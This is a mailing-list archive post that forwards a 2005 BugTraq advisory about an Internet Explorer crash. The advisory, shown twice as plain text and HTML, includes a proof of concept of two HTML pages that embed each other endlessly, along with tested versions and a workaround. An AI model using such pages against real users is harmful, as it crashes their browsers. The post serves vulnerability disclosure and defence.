No subject


Wed Nov 1 13:33:48 EST 2006


Microsoft Internet Explorer - Crash on processing embedded files with
endless loop (05/28/2005)

Description:
There is a bug in Microsoft Internet Explorer, which causes a crash in it.
The bug occurs, because Microsoft Internet Explorer doesn't limit the 
depth
of embedded files.

Affected software:
Microsoft Internet Explorer

Workaround:
Deactivate "ActiveX" in the IE options menu.

Proof-of-Concept exploit:

Page #1 (save as "btf1.htm"):

<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf2.htm" width="0" height="0"></object>
</body></html>

Page #2 (save as "btf2.htm"):

<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf1.htm" width="0" height="0"></object>
</body></html>

Date of discovery:
26. September 2003

Tested software:
Microsoft Internet Explorer 6 SP2 (6.0.2900.2180.xpsp_sp2_gdr.050301-1519)
on a fully patched Windows XP SP2 system.

DLL versions:
MSHTML.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
BROWSEUI.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
SHDOCVW.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
SHLWAPI.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
URLMON.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)
WININET.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)

Regards,
Benjamin Tobias Franz
Germany


Eoin Keary
Contractor
Allianz Ireland
IT Security (Tech Admin)
Security Projects Division
Dir: + 353-1-613-3490
Mob: + 353-87-904-1922
Mailto:eoin.keary at allianz.ie
Ph  01 6133490





xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Allianz Ireland p.l.c. and Allianz Corporate Ireland p.l.c. are companies of the Allianz Group, Europe's leading global insurer and provider of financial services. 
For more information on our products and services log on to www.allianz.ie or call us on (01)613 3000.

The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action or reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you have received this in error, please contact the sender and delete the material from your computer.

Allianz Ireland p.l.c. trading as Allianz is regulated by the Irish Financial Services Regulatory Authority (IFSRA). 
Allianz Corporate Ireland p.l.c. trading as Allianz is regulated by the Irish Financial Services Regulatory Authority (IFSRA).
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx






--=_alternative 003B90AD00257013_=
Content-Type: text/html; charset="US-ASCII"


<br><font size=2 face="sans-serif">From BugTraq,</font>
<br><font size=2 face="sans-serif">A nice little IE vuln:</font>
<br>
<br><font size=3 face="Arial">Microsoft Internet Explorer - Crash on processing
embedded files with<br>
endless loop (05/28/2005)<br>
<br>
Description:<br>
There is a bug in Microsoft Internet Explorer, which causes a crash in
it.<br>
The bug occurs, because Microsoft Internet Explorer doesn't limit the depth<br>
of embedded files.<br>
<br>
Affected software:<br>
Microsoft Internet Explorer<br>
<br>
Workaround:<br>
Deactivate &quot;ActiveX&quot; in the IE options menu.<br>
<br>
Proof-of-Concept exploit:<br>
<br>
Page #1 (save as &quot;btf1.htm&quot;):<br>
<br>
&lt;html&gt;&lt;head&gt;&lt;title&gt;BTF - MSIE crash&lt;/title&gt;&lt;/head&gt;&lt;body&gt;<br>
&lt;object data=&quot;./btf2.htm&quot; width=&quot;0&quot; height=&quot;0&quot;&gt;&lt;/object&gt;<br>
&lt;/body&gt;&lt;/html&gt;<br>
<br>
Page #2 (save as &quot;btf2.htm&quot;):<br>
<br>
&lt;html&gt;&lt;head&gt;&lt;title&gt;BTF - MSIE crash&lt;/title&gt;&lt;/head&gt;&lt;body&gt;<br>
&lt;object data=&quot;./btf1.htm&quot; width=&quot;0&quot; height=&quot;0&quot;&gt;&lt;/object&gt;<br>
&lt;/body&gt;&lt;/html&gt;<br>
<br>
Date of discovery:<br>
26. September 2003<br>
<br>
Tested software:<br>
Microsoft Internet Explorer 6 SP2 (6.0.2900.2180.xpsp_sp2_gdr.050301-1519)<br>
on a fully patched Windows XP SP2 system.<br>
<br>
DLL versions:<br>
MSHTML.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)<br>
BROWSEUI.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)<br>
SHDOCVW.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)<br>
SHLWAPI.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)<br>
URLMON.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)<br>
WININET.DLL: 6.00.2900.2627 (xpsp_sp2_gdr.050309-1648)<br>
<br>
Regards,</font>
<br><font size=3 color=#888888 face="Arial">Benjamin Tobias Franz<br>
Germany</font>
<br><font size=2 face="sans-serif"><br>
<br>
Eoin Keary<br>
Contractor<br>
Allianz Ireland<br>
IT Security (Tech Admin)<br>
Security Projects Division<br>
Dir: + 353-1-613-3490<br>
Mob: + 353-87-904-1922<br>
Mailto:eoin.keary at allianz.ie<br>
Ph &nbsp;01 6133490</font><FONT SIZE=3><BR>
<BR>
<BR>
<BR>
<BR>
<BR>
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx<BR>
Allianz Ireland p.l.c. and Allianz Corporate Ireland p.l.c. are companies of the Allianz Group, Europe's leading global insurer and provider of financial services. <BR>
For more information on our products and services log on to www.allianz.ie or call us on (01)613 3000.<BR>
<BR>
The information transmitted is intended only for the person or entity to which it is addressed and may contain confidential and/or privileged material. Any review, retransmission, dissemination or other use of, or taking of any action or reliance upon, this information by persons or entities other than the intended recipient is prohibited. If you have received this in error, please contact the sender and delete the material from your computer.<BR>
<BR>
Allianz Ireland p.l.c. trading as Allianz is regulated by the Irish Financial Services Regulatory Authority (IFSRA). <BR>
Allianz Corporate Ireland p.l.c. trading as Allianz is regulated by the Irish Financial Services Regulatory Authority (IFSRA).<BR>
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx<BR>
<BR>
<BR>
<BR>
<BR>
</FONT>

--=_alternative 003B90AD00257013_=--




More information about the Owasp-ireland mailing list